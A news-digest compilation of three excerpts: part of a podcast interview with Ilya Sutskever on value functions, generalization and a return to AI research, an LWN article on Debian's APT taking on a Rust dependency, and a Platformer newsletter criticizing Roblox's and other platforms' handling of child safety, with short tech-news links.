Somehow a human being, after even 15 years with a tiny fraction of the pre-training data, they know much less. But whatever they do know, they know much more deeply somehow. Already at that age, you would not make mistakes that our AIs make.
There is another thing. You might say, could it be something like evolution? The answer is maybe. But in this case, I think evolution might actually have an edge. I remember reading about this case. One way in which neuroscientists can learn about the brain is by studying people with brain damage to different parts of the brain. Some people have the most strange symptoms you could imagine. It’s actually really, really interesting.
One case that comes to mind that’s relevant. I read about this person who had some kind of brain damage, a stroke or an accident, that took out his emotional processing. So he stopped feeling any emotion. He still remained very articulate and he could solve little puzzles, and on tests he seemed to be just fine. But he felt no emotion. He didn’t feel sad, he didn’t feel anger, he didn’t feel animated. He became somehow extremely bad at making any decisions at all. It would take him hours to decide on which socks to wear. He would make very bad financial decisions.
What does it say about the role of our built-in emotions in making us a viable agent, essentially? To connect to your question about pre-training, maybe if you are good enough at getting everything out of pre-training, you could get that as well. But that’s the kind of thing which seems… Well, it may or may not be possible to get that from pre-training.
What is “that”? Clearly not just directly emotion. It seems like some almost value function-like thing which is telling you what the end reward for any decision should be. You think that doesn’t sort of implicitly come from pre-training?
I think it could. I’m just saying it’s not 100% obvious.
But what is that? How do you think about emotions? What is the ML analogy for emotions?
It should be some kind of a value function thing. But I don’t think there is a great ML analogy because right now, value functions don’t play a very prominent role in the things people do.
It might be worth defining for the audience what a value function is, if you want to do that.
Certainly, I’ll be very happy to do that. When people do reinforcement learning, the way reinforcement learning is done right now, how do people train those agents? You have your neural net and you give it a problem, and then you tell the model, “Go solve it.” The model takes maybe thousands, hundreds of thousands of actions or thoughts or something, and then it produces a solution. The solution is graded.
And then the score is used to provide a training signal for every single action in your trajectory. That means that if you are doing something that goes for a long time—if you’re training a task that takes a long time to solve—it will do no learning at all until you come up with the proposed solution. That’s how reinforcement learning is done naively. That’s how o1, R1 ostensibly are done.
The value function says something like, “Maybe I could sometimes, not always, tell you if you are doing well or badly.” The notion of a value function is more useful in some domains than others. For example, when you play chess and you lose a piece, I messed up. You don’t need to play the whole game to know that what I just did was bad, and therefore whatever preceded it was also bad.
The value function lets you short-circuit the wait until the very end. Let’s suppose that you are doing some kind of a math thing or a programming thing, and you’re trying to explore a particular solution or direction. After, let’s say, a thousand steps of thinking, you concluded that this direction is unpromising. As soon as you conclude this, you could already get a reward signal a thousand timesteps previously, when you decided to pursue down this path. You say, “Next time I shouldn’t pursue this path in a similar situation,” long before you actually came up with the proposed solution.
This was in the DeepSeek R1 paper— that the space of trajectories is so wide that maybe it’s hard to learn a mapping from an intermediate trajectory and value. And also given that, in coding for example you’ll have the wrong idea, then you’ll go back, then you’ll change something.
This sounds like such a lack of faith in deep learning. Sure it might be difficult, but nothing deep learning can’t do. My expectation is that a value function should be useful, and I fully expect that they will be used in the future, if not already.
What I was alluding to with the person whose emotional center got damaged, it’s more that maybe what it suggests is that the value function of humans is modulated by emotions in some important way that’s hardcoded by evolution. And maybe that is important for people to be effective in the world.
That’s the thing I was planning on asking you. There’s something really interesting about emotions of the value function, which is that it’s impressive that they have this much utility while still being rather simple to understand.
I have two responses. I do agree that compared to the kind of things that we learn and the things we are talking about, the kind of AI we are talking about, emotions are relatively simple. They might even be so simple that maybe you could map them out in a human-understandable way. I think it would be cool to do.
In terms of utility though, I think there is a thing where there is this complexity-robustness tradeoff, where complex things can be very useful, but simple things are very useful in a very broad range of situations. One way to interpret what we are seeing is that we’ve got these emotions that evolved mostly from our mammal ancestors and then fine-tuned a little bit while we were hominids, just a bit. We do have a decent amount of social emotions though which mammals may lack. But they’re not very sophisticated. And because they’re not sophisticated, they serve us so well in this very different world compared to the one that we’ve been living in.
Actually, they also make mistakes. For example, our emotions… Well actually, I don’t know. Does hunger count as an emotion? It’s debatable. But I think, for example, our intuitive feeling of hunger is not succeeding in guiding us correctly in this world with an abundance of food.
People have been talking about scaling data, scaling parameters, scaling compute. Is there a more general way to think about scaling? What are the other scaling axes?
Here’s a perspective that I think might be true. The way ML used to work is that people would just tinker with stuff and try to get interesting results. That’s what’s been going on in the past.
Then the scaling insight arrived. Scaling laws, GPT-3, and suddenly everyone realized we should scale. This is an example of how language affects thought. “Scaling” is just one word, but it’s such a powerful word because it informs people what to do. They say, “Let’s try to scale things.” So you say, what are we scaling? Pre-training was the thing to scale. It was a particular scaling recipe.
The big breakthrough of pre-training is the realization that this recipe is good. You say, “Hey, if you mix some compute with some data into a neural net of a certain size, you will get results. You will know that you’ll be better if you just scale the recipe up.” This is also great. Companies love this because it gives you a very low-risk way of investing your resources.
It’s much harder to invest your resources in research. Compare that. If you research, you need to be like, “Go forth researchers and research and come up with something”, versus get more data, get more compute. You know you’ll get something from pre-training.
Indeed, it looks like, based on various things some people say on Twitter, maybe it appears that Gemini have found a way to get more out of pre-training. At some point though, pre-training will run out of data. The data is very clearly finite. What do you do next? Either you do some kind of souped-up pre-training, a different recipe from the one you’ve done before, or you’re doing RL, or maybe something else. But now that compute is big, compute is now very big, in some sense we are back to the age of research.
Maybe here’s another way to put it. Up until 2020, from 2012 to 2020, it was the age of research. Now, from 2020 to 2025, it was the age of scaling—maybe plus or minus, let’s add error bars to those years—because people say, “This is amazing. You’ve got to scale more. Keep scaling.” The one word: scaling.
But now the scale is so big. Is the belief really, “Oh, it’s so big, but if you had 100x more, everything would be so different?” It would be different, for sure. But is the belief that if you just 100x the scale, everything would be transformed? I don’t think that’s true. So it’s back to the age of research again, just with big computers.
That’s a very interesting way to put it. But let me ask you the question you just posed then. What are we scaling, and what would it mean to have a recipe? I guess I’m not aware of a very clean relationship that almost looks like a law of physics which existed in pre-training. There was a power law between data or compute or parameters and loss. What is the kind of relationship we should be seeking, and how should we think about what this new recipe might look like?
We’ve already witnessed a transition from one type of scaling to a different type of scaling, from pre-training to RL. Now people are scaling RL. Now based on what people say on Twitter, they spend more compute on RL than on pre-training at this point, because RL can actually consume quite a bit of compute. You do very long rollouts, so it takes a lot of compute to produce those rollouts. Then you get a relatively small amount of learning per rollout, so you really can spend a lot of compute.
I wouldn’t even call it scaling. I would say, “Hey, what are you doing? Is the thing you are doing the most productive thing you could be doing? Can you find a more productive way of using your compute?” We’ve discussed the value function business earlier. Maybe once people get good at value functions, they will be using their resources more productively. If you find a whole other way of training models, you could say, “Is this scaling or is it just using your resources?” I think it becomes a little bit ambiguous.
In the sense that, when people were in the age of research back then, it was, “Let’s try this and this and this. Let’s try that and that and that. Oh, look, something interesting is happening.” I think there will be a return to that.
If we’re back in the era of research, stepping back, what is the part of the recipe that we need to think most about? When you say value function, people are already trying the current recipe, but then having LLM-as-a-Judge and so forth. You could say that’s a value function, but it sounds like you have something much more fundamental in mind. Should we even rethink pre-training at all and not just add more steps to the end of that process?
The discussion about value function, I think it was interesting. I want to emphasize that I think the value function is something that’s going to make RL more efficient, and I think that makes a difference. But I think anything you can do with a value function, you can do without, just more slowly. The thing which I think is the most fundamental is that these models somehow just generalize dramatically worse than people. It’s super obvious. That seems like a very fundamental thing.
So this is the crux: generalization. There are two sub-questions. There’s one which is about sample efficiency: why should it take so much more data for these models to learn than humans? There’s a second question. Even separate from the amount of data it takes, why is it so hard to teach the thing we want to a model than to a human? For a human, we don’t necessarily need a verifiable reward to be able to… You’re probably mentoring a bunch of researchers right now, and you’re talking with them, you’re showing them your code, and you’re showing them how you think. From that, they’re picking up your way of thinking and how they should do research.
You don’t have to set a verifiable reward for them that’s like, “Okay, this is the next part of the curriculum, and now this is the next part of your curriculum. Oh, this training was unstable.” There’s not this schleppy, bespoke process. Perhaps these two issues are actually related in some way, but I’d be curious to explore this second thing, which is more like continual learning, and this first thing, which feels just like sample efficiency.
You could actually wonder that one possible explanation for the human sample efficiency that needs to be considered is evolution. Evolution has given us a small amount of the most useful information possible. For things like vision, hearing, and locomotion, I think there’s a pretty strong case that evolution has given us a lot.
For example, human dexterity far exceeds… I mean robots can become dexterous too if you subject them to a huge amount of training in simulation. But to train a robot in the real world to quickly pick up a new skill like a person does seems very out of reach. Here you could say, “Oh yeah, locomotion. All our ancestors needed great locomotion, squirrels. So with locomotion, maybe we’ve got some unbelievable prior.”
You could make the same case for vision. I believe Yann LeCun made the point that children learn to drive after 10 hours of practice, which is true. But our vision is so good. At least for me, I remember myself being a five-year-old. I was very excited about cars back then. I’m pretty sure my car recognition was more than adequate for driving already as a five-year-old. You don’t get to see that much data as a five-year-old. You spend most of your time in your parents’ house, so you have very low data diversity.
But you could say maybe that’s evolution too. But in language and math and coding, probably not.
It still seems better than models. Obviously, models are better than the average human at language, math, and coding. But are they better than the average human at learning?
Oh yeah. Oh yeah, absolutely. What I meant to say is that language, math, and coding—and especially math and coding—suggests that whatever it is that makes people good at learning is probably not so much a complicated prior, but something more, some fundamental thing.
I’m not sure I understood. Why should that be the case?
So consider a skill in which people exhibit some kind of great reliability. If the skill is one that was very useful to our ancestors for many millions of years, hundreds of millions of years, you could argue that maybe humans are good at it because of evolution, because we have a prior, an evolutionary prior that’s encoded in some very non-obvious way that somehow makes us so good at it.
But if people exhibit great ability, reliability, robustness, and ability to learn in a domain that really did not exist until recently, then this is more an indication that people might have just better machine learning, period.
How should we think about what that is? What is the ML analogy? There are a couple of interesting things about it. It takes fewer samples. It’s more unsupervised. A child learning to drive a car… Children are not learning to drive a car. A teenager learning how to drive a car is not exactly getting some prebuilt, verifiable reward. It comes from their interaction with the machine and with the environment. It takes much fewer samples. It seems more unsupervised. It seems more robust?
Much more robust. The robustness of people is really staggering.
Do you have a unified way of thinking about why all these things are happening at once? What is the ML analogy that could realize something like this?
One of the things that you’ve been asking about is how can the teenage driver self-correct and learn from their experience without an external teacher? The answer is that they have their value function. They have a general sense which is also, by the way, extremely robust in people. Whatever the human value function is, with a few exceptions around addiction, it’s actually very, very robust.
So for something like a teenager that’s learning to drive, they start to drive, and they already have a sense of how they’re driving immediately, how badly they are, how unconfident. And then they see, “Okay.” And then, of course, the learning speed of any teenager is so fast. After 10 hours, you’re good to go.
It seems like humans have some solution, but I’m curious about how they are doing it and why is it so hard? How do we need to reconceptualize the way we’re training models to make something like this possible?
That is a great question to ask, and it’s a question I have a lot of opinions about. But unfortunately, we live in a world where not all machine learning ideas are discussed freely, and this is one of them. There’s probably a way to do it. I think it can be done. The fact that people are like that, I think it’s a proof that it can be done.
There may be another blocker though, which is that there is a possibility that the human neurons do more compute than we think. If that is true, and if that plays an important role, then things might be more difficult. But regardless, I do think it points to the existence of some machine learning principle that I have opinions on. But unfortunately, circumstances make it hard to discuss in detail.
Nobody listens to this podcast, Ilya.
I’m curious. If you say we are back in an era of research, you were there from 2012 to 2020. What is the vibe now going to be if we go back to the era of research?
For example, even after AlexNet, the amount of compute that was used to run experiments kept increasing, and the size of frontier systems kept increasing. Do you think now that this era of research will still require tremendous amounts of compute? Do you think it will require going back into the archives and reading old papers?
You were at Google and OpenAI and Stanford, these places, when there was more of a vibe of research? What kind of things should we be expecting in the community?
One consequence of the age of scaling is that scaling sucked out all the air in the room. Because scaling sucked out all the air in the room, everyone started to do the same thing. We got to the point where we are in a world where there are more companies than ideas by quite a bit. Actually on that, there is this Silicon Valley saying that says that ideas are cheap, execution is everything. People say that a lot, and there is truth to that. But then I saw someone say on Twitter something like, “If ideas are so cheap, how come no one’s having any ideas?” And I think it’s true too.
If you think about research progress in terms of bottlenecks, there are several bottlenecks. One of them is ideas, and one of them is your ability to bring them to life, which might be compute but also engineering. If you go back to the ’90s, let’s say, you had people who had pretty good ideas, and if they had much larger computers, maybe they could demonstrate that their ideas were viable. But they could not, so they could only have a very, very small demonstration that did not convince anyone. So the bottleneck was compute.
Then in the age of scaling, compute has increased a lot. Of course, there is a question of how much compute is needed, but compute is large. Compute is large enough such that it’s not obvious that you need that much more compute to prove some idea. I’ll give you an analogy. AlexNet was built on two GPUs. That was the total amount of compute used for it. The transformer was built on 8 to 64 GPUs. No single transformer paper experiment used more than 64 GPUs of 2017, which would be like, what, two GPUs of today? The ResNet, right? You could argue that the o1 reasoning was not the most compute-heavy thing in the world.
...
Read the original on www.dwarkesh.com »
The following subscription-only content has been made available to you by an LWN subscriber. Thousands of subscribers depend on LWN for the best news from the Linux and free software communities. If you enjoy this article, please consider subscribing to LWN. Thank you for visiting LWN.net!
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian’s Advanced Package
Tool (APT) can have far-reaching effects. For example, Julian Andres Klode’s declaration
that APT would require Rust in May 2026 means that a few of Debian’s unofficial ports must either acquire a working Rust toolchain or depend on an old version of APT. This has raised several questions within the project, particularly about the ability of a single maintainer to make changes that have widespread impact.
On October 31, Klode sent an announcement to the debian-devel mailing list that he intended to introduce Rust dependencies and code into APT as soon as May 2026:
This extends at first to the Rust compiler and standard library, and the Sequoia ecosystem.
In particular, our code to parse .deb, .ar, .tar, and the HTTP signature verification code would strongly benefit from memory safe languages and a stronger approach to unit testing.
If you maintain a port without a working Rust toolchain, please ensure it has one within the next 6 months, or sunset the port.
Klode added this was necessary so that the project as a whole could move forward, rely on modern technologies, “and not be held back by
trying to shoehorn modern software on retro computing
devices”. Some Debian developers have welcomed the news. Paul Tagliamonte acknowledged
that it would impact unofficial Debian ports but called the push toward Rust “”.
However, John Paul Adrian Glaubitz complained
that Klode’s wording was unpleasant and that the approach was confrontational. In another
message, he explained that he was not against adoption of Rust; he had worked on enabling Rust on many of the Debian architectures and helped to fix architecture-specific bugs in the Rust toolchain as well as LLVM upstream. However, the message strongly suggested there was no room for a change in plan: Klode had ended his message with “”, which invited no further discussion. Glaubitz was one of a few Debian developers who expressed discomfort with Klode’s communication style in the message.
Klode noted, briefly, that Rust was already a hard requirement for all Debian release architectures and ports, except for Alpha (alpha), Motorola 680x0 (m68k),
PA-RISC (hppa), and
SuperH (sh4), because of APT’s use of the Sequoia-PGP
project’s tool to verify OpenPGP
signatures. APT falls back to using the GNU Privacy Guard signature-verification tool, , on ports that do not have a Rust compiler. By depending directly on Rust, though, APT itself would not be available on ports without a Rust compiler. LWN recently
covered the state of Linux architecture support, and the status of Rust support for each one.
None of the ports listed by Klode are among those officially
supported by Debian today, or targeted for support in Debian 14 (“forky”). The sh4 port has never been officially supported, and none of the other ports have been supported since Debian 6.0. The actual impact on the ports lacking Rust is also less dramatic than it sounded at first. Glaubitz assured
Antoni Boucher that “”, but phrasing it that way “gets more attention in the
news”. Boucher is the maintainer of , a GCC
ahead-of-time code generator for Rust. Nothing, Glaubitz said, stops ports from using a non-Rust version of APT until Boucher and others manage to bootstrap Rust for those ports.
David Kalnischkies, who is also a major
contributor to APT, suggested
that if the goal is to reduce bugs, it would be better to remove the code that is used to parse the .deb, .ar, and .tar formats that Klode mentioned from APT entirely. It is only needed for two tools,
and , he said, and the only “” of
was by Klode’s employer, Canonical, for its Launchpad software-collaboration platform. If those were taken out of the main APT code base, then it would not matter whether they were written in Rust, Python, or another language, since the tools are not directly necessary for any given port.
Kalnischkies also questioned the claim that Rust was necessary to achieve the stronger approach to unit testing that Klode mentioned:
You can certainly do unit tests in C++, we do. The main problem is that someone has to write those tests. Like docs.
Your new solver e.g. has none (apart from our preexisting integration tests). You don’t seriously claim that is because of C++ ? If you don’t like GoogleTest, which is what we currently have, I could suggest doctest (as I did in previous installments). Plenty other frameworks exist with similar or different styles.
Klode has not responded to those comments yet, which is a bit unfortunate given the fact that introducing hard dependencies on Rust has an impact beyond his own work on APT. It may well be that he has good answers to the questions, but it can also give the impression that Klode is simply embracing a trend toward Rust. He is involved
in the Ubuntu work to migrate from GNU Coreutils to the Rust-based uutils. The reasons given for that work, again, are around modernization and better security—but security is not automatically guaranteed simply by switching to Rust, and there are a number of other considerations.
For example, Adrian Bunk pointed
out that there are a number of Debian teams, as well as tooling, that will be impacted by writing some of APT in Rust. The release notes for Debian 13 (“trixie”) mention
that Debian’s infrastructure “currently has problems with
rebuilding packages of types that systematically use static
linking”, such as those with code written in Go and Rust. Thus, “these packages will be
covered by limited security support until the infrastructure is
improved to deal with them maintainably”. Limited security support means that updates to Rust libraries are likely to only be released when Debian publishes a point release, which happens about every two months. The security team has specifically
stated that is fully supported, but there are still outstanding problems.
Due to the static-linking issue, any time one of ’s dependencies, currently more than 40 Rust crates, have to be rebuilt due to a security issue, (at least potentially) also needs to be rebuilt. There are also difficulties in tracking CVEs for all of its dependencies, and understanding when a security vulnerability in a Rust crate may require updating a Rust program that depends on it.
Fabian Grünbichler, a maintainer of Debian’s Rust toolchain, listed
several outstanding problems Debian has with dealing with Rust packages. One of the largest is the need for a consistent Debian policy for declaring statically linked libraries. In 2022, Guillem Jover added a control field for Debian packages called Static-Built-Using (SBU), which would list the source packages used to build a binary package. This would indicate when a binary package needs to be rebuilt due to an update in another source package. For example, depends on more than 40 Rust crates that are packaged for Debian. Without declaring the SBUs, it may not be clear if needs to be updated when one of its dependencies is updated. Debian has been working on a policy
requirement for SBU since April 2024, but it is not yet finished or adopted.
The discussion sparked by Grünbichler makes clear that most of Debian’s Rust-related problems are in the process of being solved. However, there’s no evidence that Klode explored the problems before declaring that APT would depend on Rust, or even asked “is this a reasonable time frame to introduce this dependency?”
Debian’s tagline, or at least one of its taglines, is “the universal operating system”, meaning that the project aims to run on a wide variety of hardware (old and new) and be usable on the desktop, server, IoT devices, and more. The “Why Debian” page lists a number of reasons users and developers should choose the distribution: multiple hardware
architectures, long-term
support, and its democratic governance
structure are just a few of the arguments it puts forward in favor of Debian. It also notes that “Debian cannot be controlled by a
single company”. A single developer employed by a company to work on Debian tools pushing a change that seems beneficial to that company, without discussion or debate, that impacts multiple hardware architectures and that requires other volunteers to do unplanned work or meet an artificial deadline seems to go against many of the project’s stated values.
Debian, of course, does have checks and balances that could be employed if other Debian developers feel it necessary. Someone could, for example, appeal to Debian’s Technical Committee, or sponsor a general resolution to override a developer if they cannot be persuaded by discussion alone. That happened recently when the committee required systemd
maintainers to provide the directory “until
a satisfactory migration of impacted software has occurred and Policy
updated accordingly”.
However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added
support for the DEB822
format for its source information lists in 2015. Despite APT supporting that format for years, Klode faced resistance in 2021, when he pushed
for Debian to move to the new format ahead of the Debian 12 (“bookworm”) release in 2021, but was unsuccessful. It is now the default for trixie with the move to APT 3.0, though APT will continue to support the old format for years to come.
The fact is, regardless of what Klode does with APT, more and more free software is being written (or rewritten) in Rust. Making it easier to support that software when it is packaged for Debian is to everyone’s benefit. Perhaps the project needs some developers who will be aggressive about pushing the project to move more quickly in improving its support for Rust. However, what is really needed is more developers lending a hand to do the work that is needed to support Rust in Debian and elsewhere, such as . It does not seem in keeping with Debian’s community focus for a single developer to simply declare dependencies that other volunteers will have to scramble to support.
...
Read the original on lwn.net »
What is the role of tech journalism in a world where CEOs no longer feel shame?
What is the role of tech journalism in a world where CEOs no longer feel shame?
On Friday, the Hard Fork team published our interview with Roblox CEO David Baszucki. In the days since, it has become the most-discussed interview we’ve done in three years on the show. Listeners who wrote in to us said they were shocked to hear the leader of a platform with 151.5 million monthly users, most of them minors, express frustration and annoyance at being asked about the company’s history of failures related to child safety. Journalists described the interview as “bizarre,” “unhinged,” and a “car crash.”
And a case can be made that it was all of those things — even if Baszucki, in the studio afterwards and later on X, insisted to us that he had had a good time. In the moment, though, Baszucki’s dismissive attitude toward discussing child safety struck me as something worse: familiar.
Baszucki, after all, is not the first CEO to have insisted to me that a platform’s problems are smaller than I am making them out to be. Nor is he the first to blame the platform’s enormous scale, or to try to change the subject. (He is the first tech CEO to suggest to me that maybe there should be prediction markets in video games for children, but that’s another story.)
What people found noteworthy about our interview, I think, was the fresh evidence that our most successful tech CEOs really do think and talk this way. Given a chance to display empathy for the victims of crimes his platform enabled, or to convey regret about historical safety lapses, or even just to gesture at some sense of responsibility for the hundreds of millions of children who in various ways are depending on him, the CEO throws up his hands and asks: how long are you guys going to be going on about all this stuff?
Roblox is different from other social products in that it explicitly courts users as young as 5. (You are supposed to be at least 13 to use Instagram, TikTok, and other major platforms.) That has always put significant pressure on the company to develop serious safety features. The company says it spends hundreds of millions of dollars a year on safety, and that 10 percent of its employees work on trust and safety issues. And trust and safety workers I know tell me that they respect Roblox’s safety teams.
At the same time, this is a platform launched in 2006 where, for most of its history, adults could freely approach and message any minor unless their parents had dug into the app settings. Roblox did not verify users’ ages, letting any child identify as 13 or older to bypass content restrictions. Filters intended to prevent inappropriate chat or the exchange of personal information were easily bypassed by slightly changing the spelling of words. Parental controls could be circumvented simply by a child creating a new account and declaring that they were at least 13.
Last year the company introduced new restrictions on chat. And this year, the company said it would deploy its own age estimation technology to determine users’ ages and restrict the content available to them accordingly. This rollout was the main reason we had sought to interview Baszucki in the first place — something we had communicated to his team.
Which only made it stranger when Baszucki expressed surprise at our line of inquiry and threw his PR team under the bus. (“If our PR people said, “Let’s talk about age-gating for an hour,′ I’m up for it, but I love your pod. I thought I came here to talk about everything,’” he said.)
Since 2018, at least two dozen people in the United States have been arrested and accused of abducting or abusing victims they met on Roblox, according to a 2024 investigation by Bloomberg. Attorneys general in Texas, Kentucky, and Louisiana have filed lawsuits against Roblox alleging that the platform facilitates child exploitation and grooming. More than 35 families have filed lawsuits against the company over child predation.
As recently as this month, a reporter for the Guardian created an account presenting herself as a child and found that in Roblox she could wander user-created strip clubs, casinos, and horror games. In one “hangout” game, in which she identified as a 13-year-old, another avatar sexually assaulted her by thrusting his hips into her avatar’s face as she begged him to leave her alone.
It’s true that any platform that lets strangers communicate will lead to real-world harm. I believe that millions of children use Roblox daily without incident. And we would not want to shut down the entire internet to prevent a single bad thing from ever happening.
But there is much a leader can do with the knowledge that his platform will inevitably lead to harm, should he wish.
Understanding how attractive Roblox would be to predators, the company long ago could have blocked unrestricted contact between adults and minors. It could have adopted age verification before a wave of state legislation signaled that it would soon become mandatory anyway. It could have made it harder for children under 13 to create new accounts, and require them to get parental consent in a way it could verify.
But doing so would require Roblox to focus on outcomes for children, at the likely expense of growth. And so here we are.
Galling? Yes. But like I said: it’s also familiar.
Over and over again, we have seen leaders in Baszucki’s position choose growth over guardrails. Safety features come out years after the need for them is identified, if at all. Internal critics are sidelined, laid off, or managed out. And when journalists ask, politely but insistently, why so many of their users are suffering, executives laugh and tell us that we’re the crazy ones.
Look at OpenAI, where the company is reckoning with the fact that making its models less sycophantic has been worse for user engagement — and is building new features to turn the engagement dial back up.
Look at TikTok, which has answered concerns that short-form video is worsening academic performance for children with new “digital well-being features” that include an affirmation journal, a “background sound generator aimed at improving the mental health of its users,” and “new badges to reward people who use the platform within limits, especially teens.” Answering concerns that teens are using the app too much with more reasons to use the app.
Or look at Meta, where new court filings from over the weekend allege … a truly staggering number of things. To name a few: the company “stalled internal efforts to prevent child predators from contacting minors for years due to growth concerns,” according to Jeff Horwitz in Reuters; “recognized that optimizing its products to increase teen engagement resulted in serving them more harmful content, but did so anyway”; and gave users 17 attempts to traffic people for sex before banning their accounts. (Meta denies the allegations, which are drawn from internal documents that have not been made public; Meta has also objected to unsealing the documents.)
Lawsuits will always contain the most salacious allegations lawyers can find, of course. But what struck me about these latest filings is not the lawyers’ predictably self-serving framing but rather the quotes from Meta’s own employees.
When the company declined to publish internal research from 2019 which showed that no longer looking at Facebook and Instagram improved users’ mental health, one employee said: “If the results are bad and we don’t publish and they leak … is it going to look like tobacco companies doing research and knowing cigs were bad and then keeping that info to themselves?”
When Meta researchers found that by 2018, approximately 40 percent of children ages 9 to 12 were daily Instagram users — despite the fact that you are supposed to be 13 to join — some employees bristled at what they perceived as tacit encouragement from executives to accelerate growth efforts among children.
“Oh good, we’re going after Time’s account of the brief. “Zuck has been talking about that for a while…targeting 11 year olds feels like tobacco companies a couple decades ago (and today). Like we’re seriously saying ‘we have to hook them young’ here.”
When Meta studied the potential of its products to be addictive in 2018, it found that 55 percent of 20,000 surveyed users showed at least some signs of “problematic use.” When it published that research the following year, though, it redefined “problematic use” to include only the most severe cases — 3.1 percent of users.
“Because our product exploits weaknesses in the human psychology to promote product engagement and time spent,” a user experience researcher wrote, the company should “alert people to the effect that the product has on their brain.”
You will not be surprised to learn that the company did not alert people to the issue.
As usual, the rank-and-file employees are doing their job. Over and over again, though, their boss’ boss tells them to stop.
The thing is, platforms’ strategy of delay, deny and deflect mostly works.
Americans have short attention spans — and lots to worry about. The tech backlash that kicked off in 2017 inspired platforms to make meaningful and effective investments in content moderation, cybersecurity, platform integrity, and other teams that worked to protect their user bases. Imperfect as these efforts were, they bolstered my sense that tech platforms were susceptible to pressure from the public, from lawmakers and from journalists. They acted slowly, and incompletely, but at least they acted.
Fast forward to today and the bargain no longer holds. Platforms do whatever the president of the United States tells them to do, and very little else. Shame, that once-great regulator of social norms and executive behavior, has all but disappeared from public life. In its place is denial, defiance, and the noxious vice signaling of the investor class.
I’m still reckoning with what it means to do journalism in a world where the truth can barely hold anyone’s attention — much less hold a platform accountable, in any real sense of that word. I’m rethinking how to cover tech policy at a time when it is being made by whim. I’m noticing the degree to which platforms wish to be judged only by their stated intentions, and almost never on the outcomes of anyone who uses them.
In the meantime the platforms hurtle onward, pitching ever-more fantastical visions of the future while seeming barely interested in stewarding the present.
For the moment, I’m grateful that a car-crash interview drew attention to one CEO’s exasperation with being asked about that. But the real problem isn’t that David Baszucki talks this way. It’s that so many of his peers do, too.
The BBC caught scam call center workers on hidden cameras as they laughed at the people they were tricking.
One worker bragged about making $250k from victims. The disturbing truth?
Scammers don’t pick phone numbers at random. They buy your data from brokers.
Once your data is out there, it’s not just calls. It’s phishing, impersonation, and identity theft.
That’s why we recommend Incogni: They delete your info from the web, monitor and follow up automatically, and continue to erase data as new risks appear.
Black Friday deal: Try Incogni here and get 55% off your subscription with code PLATFORMER
What happened: Facing criticism from both parties, the Trump administration backed down from issuing an executive order that would have effectively placed a moratorium on state AI regulations, Reuters reported.
The order would have fought state regulations by withholding federal funding and establishing an “AI Litigation Task Force” to “challenge State AI laws.”
Why we’re following: Last week we covered the draft executive order and how Trump’s attempts to squash state AI regulation have drawn bipartisan backlash — and made Republicans increasingly more sympathetic to the views of AI safety advocates.
It’s always hard to guess when Trump’s instinct to do as he pleases will be thwarted by political opposition. In this case, though, the revived moratorium had little support outside the David Sacks wing of the party. And so — for now, anyway — it fell apart.
What people are saying: State lawmakers are fighting the moratorium proposal Trump made to Congress. Today, a letter signed by 280 state lawmakers urged Congress to “reject any provision that overrides state and local AI legislation.”
A moratorium would threaten existing laws that “strengthen consumer transparency, guide responsible government procurement, protect patients, and support artists and creators,” the letter said.
On the other side of the debate, the tech-funded industry PAC Leading the Future announced a $10 million campaign to push Congress to pass national AI regulations that would supersede state law.
What happened: On Friday, X debuted its About This Account feature globally in a rollout that descended into chaos over the feature’s accidental uncovering of foreign actors behind popular right-wing accounts that actively share news on US politics.
X users can now see the date an account joined the platform, how many times it has changed its username, and most importantly, the country or region it’s based in. The move, according to X head of product Nikita Bier, “is an important first step to securing the integrity of the global town square.”
But the feature has had an unintended consequence: it revealed that big pro-Trump accounts like @MAGANationX, a right-wing user with nearly 400,000 followers that regularly shares news about US politics, aren’t actually based in the US. MAGANationX, for example, is based in Eastern Europe, according to X.
Other popular right-wing accounts — that use names from the Trump family — like @IvankaNews_ (1 million followers before it was suspended), @BarronTNews (nearly 600,000 followers), and @TrumpKaiNews (more than 11,000 followers), appear to be based in Nigeria, Eastern Europe, and Macedonia respectively.
The data could be skewed by travel, VPNs, or old IP addresses, and some have complained their location is inaccurate. Bier said the rollout has “a few rough edges” that will be resolved by Tuesday.
Why we’re following: One of Elon Musk’s promises during the takeover of Twitter was to purge the platform of inauthentic accounts. But several studies have shown that suspected inauthentic activity has remained at about the same levels. X has long struggled with troll farms spreading misinformation, boosted by its tendency to monetarily reward engagement.
There’s also an irony in the fact that revealing the origins of ragebait-posting political accounts like these was once the subject of groundbreaking research by the Stanford Internet Observatory and other academic researchers. But the effort outraged Republicans, which then sued them over their contacts with the government about information operations like these and largely succeeded in stopping the work.
What people are saying: Accusations of foreign actors spreading fake news flew on both sides of the aisle. When the feature appeared to be pulled for a short period of time, Republican Gov. Ron DeSantis of Florida said “X needs to reinstate county-of-origin — it helps expose the grift.”
In a post that garnered 3.2 million views, @greg16676935420 attached a screenshot of @AmericanGuyX’s profile, which shows the account’s based in India: “BREAKING: American guy is not actually an American guy.”
“When an American billionaire offers money to people from relatively poor countries for riling up and radicalising Americans, it’s not surprising that they’ll take up the offer,” @ChrisO_wiki wrote in a post that garnered nearly 700,000 views.
In perhaps the most devastating consequence of the feature, @veespo_444s said they “spent 2 years acting mysterious over what country I live in just for Elon to fuck it all up with a single update” in a post that has 4.3 million views and 90,000 likes.
How President Trump amplifies right-wing trolls and AI memes. The crypto crash has taken about $1 billion out of the Trump family fortune.
Gamers are using Fortnite and GTA to prepare for ICE raids. How Democrats are building their online strategy to catch up with Republicans.
In the last month, Elon Musk has posted more about politics than about his companies on X.
Hundreds of English-language websites link to articles from a pro-Kremlin disinformation network and are being used to “groom” AI chatbots into spreading Russian propaganda, a study found.
Sam Altman and Jony Ive said they’re now prototyping their hardware device, but it remains two years away. An in-depth look at OpenAI’s mental health crisis after GPT-4o details how the company changed ChatGPT after reports of harmful interactions. OpenAI safety research leader Andrea Vallone, who led ChatGPT’s responses to mental health crises, is reportedly leaving. A review of ChatGPT’s new personal shopping agent.
Anthropic unveiled Claude Opus 4.5, which it said is the best model for software engineering. Other highlights from the launch: it outscored human engineering candidates on a take-home exam, is cheaper than Opus 4.1, can keep a chat going indefinitely via ongoing summarization of past chats, and is harder to trick with prompt injection.
In other research, AI models can unintentionally develop misaligned behaviors after learning to cheat, Anthropic said. (This won an approving tweet from Ilya Sutskever, who hadn’t posted about AI on X in more than a year.)
Why Meta’s $27 billion data center and its debt won’t be on its balance sheet. Meta is venturing into electricity trading to speed up its power plant construction. Facebook Groups now has a nickname feature for anonymous posting.
